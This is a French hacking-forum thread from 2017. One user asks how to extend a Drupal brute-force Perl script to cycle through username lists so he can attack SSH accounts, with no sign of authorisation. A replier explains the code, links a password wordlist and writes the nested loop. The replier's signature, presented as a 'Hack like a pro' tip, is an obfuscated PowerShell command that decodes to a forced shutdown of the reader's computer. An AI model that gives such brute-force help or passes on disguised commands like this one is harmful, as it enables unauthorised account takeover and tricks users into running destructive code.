Annonce

Réduire
Aucune annonce.

[PERL] Amelioration d'un script BruteForce Durpal !

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • [PERL] Amelioration d'un script BruteForce Durpal !

    Salut a tous ! Alors voila j'ai un trouver un script de brute force Dupral sur GitHub..
    Petit problém il ne prend qu'un utilisateur
    Je ne connais pas le PERL mais je pensse que la partie du code qui m'interesse est :


    print "[.] Enter User : ";
    chomp(my $user = <>);

    print "[.] Enter Pass List : ";
    chomp(my $file = <>);

    print "[.] Enter Thread Number : ";
    chomp(my $threads = <>);
    (Mais je ne vois pas de difference entres la ligne user et celle pass ...)

    Si l'un d'entre vous peu eclairer ma lanterne =) De plus j'aimerais en savoir plus sur "le nombre de Thread"
    Script complet a cette adresse:
    https://gist.github.com/mranarshit/c406b9a0a2cdd7626066

    Un grand merci d'avance ! Amicalement, Unamed


    PS: Le script marche niquel, mais j'aimerais pouvoir soumettre une list d'users et laisser tourner
    Dernière modification par Unamed, 02 juin 2017, 17h22.
    "Please do not use in military or secret service, or for illegal purposes."

  • #2
    En fait le code qui t’intéresse c'est plutôt ça :

    sub GetFiles {
    open( DOM, $file ) or die "$!\n";
    while( defined( my $line_ = <DOM> ) ) {
    chomp( $line_ );
    push( @pass, $line_ );
    }
    close( DOM );
    }
    Comprend comment est utilisé la liste de password, et tâche de répliquer le fonctionnement pour une liste de user.
    Ne te restera plus qu'a imbriquer la boucle de test du pass dans une boucle de test du user.

    Le nombre de thread c'est simplement la parallélisation (fork) de l'appel du code relatif au brute force (dont l'appel de la fonction brute) pour aller plus vite.

    Si c'est la syntaxe perl qui te bloque, essaye de refaire tout ça en Python : c'est un bon exercice

    A coté de ça, il faut aussi reconsidérer l’intérêt de bruteforcer le user ET le pass : beaucoup te diront (moi compris) que c'est une pure perte de temps. Pour être un vecteur d'attaque utilisable, tu dois disposer de l'un ou de l'autre.

    ./Kriss
    Hack like a pro :
    PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

    Commentaire


    • #3
      Yo Kriss ! Merci de ta reponse si rapide comme d'hab !

      Alors, j'ai deja un script python mais il est mal fait :/ et de toute facon il faut bien apprendre => je vais tenter de modifier ce script.

      Pour ce qui est de l'intérêt, je suis d'accord avec toi.. Mais je dispose justement d'une liste d'users.. J'aimerais récup une liste de pass pour lancer un BruteForce sur les compte Unix (SSH via Hydra Thc )


      Je n'est par contre pas compris quand tu dit "
      Ne te restera plus qu'a imbriquer la boucle de test du pass dans une boucle de test du user"
      (J'ai compris le principe biensur.. Mais en pratique je ne vois pas comment faire :/ Imbriquer= Une seul boucle passe et user OU ALORS Une aprés lautres ?)


      Amicalement, Unamed =)



      "Please do not use in military or secret service, or for illegal purposes."

      Commentaire


      • #4
        je dispose justement d'une liste d'users
        Ok du coup c'est possible

        une liste parmi tant d'autres : https://github.com/berzerk0/Probable...d-probable.txt

        Tu veux tester tous les pass pour CHAQUE user, du coup un truc du genre :

        Code:
        foreach my $pass (@pass){
            foreach my $user(@user){
                #code bruteforce here
            }
        }
        ./Kriss
        Hack like a pro :
        PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

        Commentaire

        Chargement...
        X